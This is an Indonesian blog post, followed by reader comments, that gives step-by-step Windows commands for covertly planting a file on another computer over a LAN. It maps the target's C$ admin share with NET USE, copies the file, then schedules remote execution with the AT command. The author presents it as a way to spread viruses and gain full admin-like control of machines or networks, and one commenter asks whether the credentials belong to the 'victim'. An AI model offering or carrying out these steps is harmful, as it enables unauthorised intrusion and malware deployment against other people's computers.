Mengirimkan File lewat Local Area Network / LAN tanpa diketahui

By Bowo' on Saturday, April 23, 2011

Salam cybers....
Lama tak sapa nih jadi kangen sama Kalian. hehe :P ada ilmu lagi nih kawan bagi kalian yang punya masalah dalam bertukaran file, mengirimkan file atau menyebar file lewat LAN. Banyak sih pren manfaatnya ada yang baik ada juga yang buruk kalian bisa mengirimkan atau menyebarkan Virus, Software, atau file apapun lewat LAN bahkan tanpa diketahui atau minta ijin sama si pemegang komputer hanya dengan menggunakan Command prompt. Ok let's try...

Siapkan file yang akan dikirimkan, sebaiknya disimpan di drive c:\ ini akan memudahkan kalian.

Buka Command prompt, klik start > Run > ketik "cmd" > Ok.

Ketik "NET USE X: \\ NOMOR IP TUJUAN \C$ /user:[user name] [password]" > Enter. perintah tersebut digunakan untuk nge-Mapp drive C:\ menjadi drive X:\ . Drive X:\ adalah drive C:\ yang berada di komputer tujuan.

Kemudian ketik "COPY NAMAFILEYANGINGINDIKIRIMKAN X:\ > Enter

File sudah berada di drive C:\ komputer tujuan.

File tersebut mungkin tidak akan berguna tanpa di eksekusi atau dijalankan, cara menjalankanya adalah dengan cara membuat jadwal pada komputer tersebut. Caranya:

Jam yang ada di komputer kita tidak pasti sama dengan jam yang ada di kompuetr tujuan, jadi cara untuk mengetahuinya yaitu Ketikan "AT\\NOMOR IP TUJUAN" maka akan diketahui jam yang ada di komputer tersebut.

Lalu ketikan "AT\\NOMOR IP TUJUAN JAM UNTUK MENJALANKAN "C:\NAMA FILE YANG INGIN DI JALANKAN" Contoh: "AT\\202.198.1.12 12:00AM "C:\DATASAYA.EXE"

Cara tersebut bisa digunakan untuk menguasai komputer tersebut bahkan jaringan, anda bisa mengirimkan aplikasi remoter untuk mengendalikan komputer tersebut secara penuh layaknya admin. Cara ini mungkin bisa di pake di jaringan Wifi atau hotspot tp saya belum pernah mencobanya.

Semoga bermanfaat....

{ 6 Comments...Add one }

Anonymous said...

klu ndak ada passwordnya gimana????

Unknown said...

pict nya dong bro ,,, kalo ada pict nya lancar kita baca nya , gak ada pict rasa nya sulit membedakan nya ..

Anonymous said...

gak ngerti saya

donimokawork said...

Kurang jelas ngk Gan

Unknown said...
This comment has been removed by the author.
yazirain said...

maaf gan ni [user name] sama[password]nya yang punya kita atau punya korban ya???

Post a Comment